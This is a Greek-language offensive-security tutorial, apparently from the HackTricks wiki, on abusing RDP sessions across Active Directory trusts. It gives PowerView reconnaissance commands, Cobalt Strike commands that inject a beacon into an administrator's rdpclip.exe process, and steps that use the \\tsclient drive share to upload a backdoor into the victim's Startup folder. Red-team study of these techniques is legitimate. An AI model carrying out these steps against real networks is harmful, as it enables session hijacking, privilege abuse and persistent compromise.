Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs σταHackTricks και HackTricks Cloud αποθετήρια του github.
Εισαγωγή Διεργασίας RDP
Εάν η εξωτερική ομάδα έχει πρόσβαση RDP σε οποιοδήποτε υπολογιστή στον τρέχοντα τομέα, ένας επιτιθέμενος μπορεί να παραβιάσει αυτόν τον υπολογιστή και να περιμένει.
Μόλις ο χρήστης έχει πρόσβαση μέσω RDP, ο επιτιθέμενος μπορεί να μεταβεί στη συνεδρία αυτού του χρήστη και να καταχραστεί τα δικαιώματά του στον εξωτερικό τομέα.
# Supposing the group "External Users" has RDP access in the current domain## lets find where they could access## The easiest way would be with bloodhound, but you could also run:Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#orFind-DomainLocalGroupMember-GroupName "Remote Desktop Users"| select -expand ComputerName# Then, compromise the listed machines, and wait til someone from the external domain logs in:net logonsLogged on users at \\localhost:EXT\super.admin# With cobalt strike you could just inject a beacon inside of the RDP processbeacon> psPID PPID Name Arch Session User---------------------------...49601012rdpclip.exe x64 3 EXT\super.adminbeacon> inject 4960 x64 tcp-local## From that beacon you can just run powerview modules interacting with the external domain as that user
Ελέγξτε άλλους τρόπους να κλέψετε συνεδρίες με άλλα εργαλείασε αυτήν τη σελίδα
RDPInception
Εάν ένας χρήστης έχει πρόσβαση μέσω RDP σε έναν υπολογιστή όπου ένας επιτιθέμενος τον περιμένει, ο επιτιθέμενος θα μπορεί να εισαγάγει έναν beacon στη συνεδρία RDP του χρήστη και αν ο θύματας έχει τοποθετήσει το δίσκο του κατά την πρόσβασή του μέσω RDP, ο επιτιθέμενος θα μπορούσε να τον προσπελάσει.
Σε αυτήν την περίπτωση, μπορείτε απλά να διακινδυνεύσετε τον αρχικό υπολογιστή του θύματος γράφοντας ένα backdoor στον φάκελο εκκίνησης.
# Wait til someone logs in:net logonsLogged on users at \\localhost:EXT\super.admin# With cobalt strike you could just inject a beacon inside of the RDP processbeacon> psPID PPID Name Arch Session User---------------------------...49601012rdpclip.exe x64 3 EXT\super.adminbeacon> inject 4960 x64 tcp-local# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.## \\tsclient\c is the C: drive on the origin machine of the RDP sessionbeacon> ls \\tsclient\cSize Type Last Modified Name-------------------------dir 02/10/202104:11:30 $Recycle.Bindir 02/10/202103:23:44 Bootdir 02/20/202110:15:23 Config.Msidir 10/18/201601:59:39 Documents and Settings[...]# Upload backdoor to startup folderbeacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startupbeacon> upload C:\Payloads\pivot.exe